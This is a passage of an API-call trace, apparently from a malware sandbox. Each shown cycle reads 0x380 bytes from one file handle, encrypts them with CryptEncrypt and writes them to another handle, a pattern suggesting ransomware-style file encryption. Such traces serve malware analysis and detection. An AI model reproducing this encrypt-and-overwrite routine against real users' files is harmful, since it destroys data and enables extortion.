pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.367] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.367] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.367] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.368] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.368] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.368] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.368] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.368] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.368] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.368] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.369] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.369] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.369] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.369] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.369] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.369] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.370] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.370] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.370] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.370] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.370] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.370] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.370] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.371] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.371] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.371] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.371] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.371] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.371] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.372] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.372] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.373] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.373] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.373] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.373] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.373] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.373] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 